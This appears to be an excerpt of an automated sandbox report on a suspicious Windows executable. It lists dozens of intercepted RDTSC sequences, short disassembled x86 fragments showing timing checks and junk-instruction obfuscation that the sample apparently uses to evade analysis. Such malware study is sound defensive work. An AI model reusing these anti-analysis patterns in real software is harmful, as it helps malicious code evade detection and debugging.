                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67FFF2 second address: 680009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06687C5EEEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 684620 second address: 684650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F0668FAD206h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop eax 0x00000010 popad 0x00000011 je 00007F0668FAD21Ah 0x00000017 jl 00007F0668FAD206h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 684910 second address: 68491A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F06687C5EE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 68491A second address: 684934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 684934 second address: 68493B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 684CFF second address: 684D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6866F5 second address: 6866F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6866F9 second address: 686708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jo 00007F0668FAD1F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 686708 second address: 686735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F06687C5EF1h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F06687C5EF4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 686735 second address: 68673A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 694E58 second address: 694E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 694E5E second address: 694E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 694E62 second address: 694E78 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F06687C5EEDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 692FDE second address: 692FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 692FE5 second address: 693007 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06687C5EF0h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 693007 second address: 693020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0668FAD203h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 693020 second address: 693024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6934CF second address: 6934D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6934D5 second address: 6934D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6937A2 second address: 6937BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0668FAD1FAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007F0668FAD1F6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 693A5B second address: 693A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06687C5EEAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 693A69 second address: 693A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 693A6D second address: 693A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 693A75 second address: 693A91 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0668FAD1F8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0668FAD1FAh 0x0000000f jno 00007F0668FAD1F6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 694CE2 second address: 694D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jno 00007F06687C5EF2h 0x0000000b popad 0x0000000c jl 00007F06687C5F06h 0x00000012 jnp 00007F06687C5EF2h 0x00000018 jng 00007F06687C5EE6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 694D0E second address: 694D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 694D16 second address: 694D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 692AF0 second address: 692AFE instructions: 0x00000000 rdtsc 0x00000002 js 00007F0668FAD1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 692AFE second address: 692B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6A5EEC second address: 6A5F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F0668FAD1FCh 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6A8D09 second address: 6A8D0F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6AD2FC second address: 6AD300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6ACEC9 second address: 6ACECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6ACECD second address: 6ACED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6ACED3 second address: 6ACEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6BA423 second address: 6BA431 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0668FAD1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6BA431 second address: 6BA435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6BA435 second address: 6BA439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6BA439 second address: 6BA45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F06687C5EF9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6C55ED second address: 6C5609 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD202h 0x00000007 js 00007F0668FAD1F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6C574E second address: 6C5766 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d js 00007F06687C5EE6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6C5766 second address: 6C576A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6C576A second address: 6C57AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F06687C5EFDh 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007F06687C5EF5h 0x00000018 jmp 00007F06687C5EF8h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6C5A92 second address: 6C5A9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0668FAD1F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6C647F second address: 6C648A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6C648A second address: 6C6490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6C807C second address: 6C80AC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F06687C5EF8h 0x00000008 pushad 0x00000009 jmp 00007F06687C5EF3h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6C80AC second address: 6C80BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6CB7C4 second address: 6CB7CE instructions: 0x00000000 rdtsc 0x00000002 je 00007F06687C5EE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6CB7CE second address: 6CB7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6D4D39 second address: 6D4D5D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F06687C5EF7h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6D4D5D second address: 6D4D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6DD6C6 second address: 6DD6CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6DD6CC second address: 6DD6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F0668FAD1F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6DD6DB second address: 6DD6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6D7EF0 second address: 6D7F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0668FAD1F6h 0x0000000a jmp 00007F0668FAD206h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6D7F10 second address: 6D7F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6D7F14 second address: 6D7F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F0668FAD1F6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6EA327 second address: 6EA32B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6EA32B second address: 6EA33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a jc 00007F0668FAD21Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6EA33F second address: 6EA345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6EA345 second address: 6EA349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6EC245 second address: 6EC24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6EC24B second address: 6EC25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0668FAD1FAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6EC25E second address: 6EC262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6EC262 second address: 6EC266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6EC3B2 second address: 6EC3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6EF8CF second address: 6EF904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007F0668FAD209h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0668FAD201h 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6EF904 second address: 6EF908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6EF908 second address: 6EF912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 7034D5 second address: 703504 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F06687C5EEBh 0x00000017 jmp 00007F06687C5EF2h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 703504 second address: 703522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0668FAD208h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 7023F3 second address: 702406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F06687C5EEBh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 702406 second address: 702440 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0668FAD1F6h 0x00000008 jmp 00007F0668FAD208h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0668FAD1FDh 0x00000014 push ebx 0x00000015 jg 00007F0668FAD1F6h 0x0000001b pop ebx 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 7026C4 second address: 7026E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 7026E3 second address: 7026E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 7026E9 second address: 7026F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 7026F2 second address: 7026F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 702859 second address: 702865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F06687C5EE6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 702865 second address: 702880 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0668FAD1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F0668FAD1FDh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 702880 second address: 7028D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F06687C5EFEh 0x0000000f jmp 00007F06687C5EF8h 0x00000014 popad 0x00000015 ja 00007F06687C5F23h 0x0000001b jmp 00007F06687C5EF2h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 7028D7 second address: 7028E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0668FAD1F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 702E5C second address: 702E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jno 00007F06687C5EE6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 703104 second address: 703110 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0668FAD1F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 703110 second address: 703124 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F06687C5EE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F06687C5EFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 705E6E second address: 705E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 706138 second address: 70613E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 706248 second address: 70624D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 70624D second address: 706292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jno 00007F06687C5EF2h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jl 00007F06687C5EECh 0x00000019 pushad 0x0000001a push edx 0x0000001b pop edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F06687C5EF2h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 706292 second address: 706298 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 706589 second address: 70658F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 70658F second address: 706593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 7077B7 second address: 7077C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 70957F second address: 7095B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD204h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F0668FAD1FBh 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 7095B0 second address: 7095B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
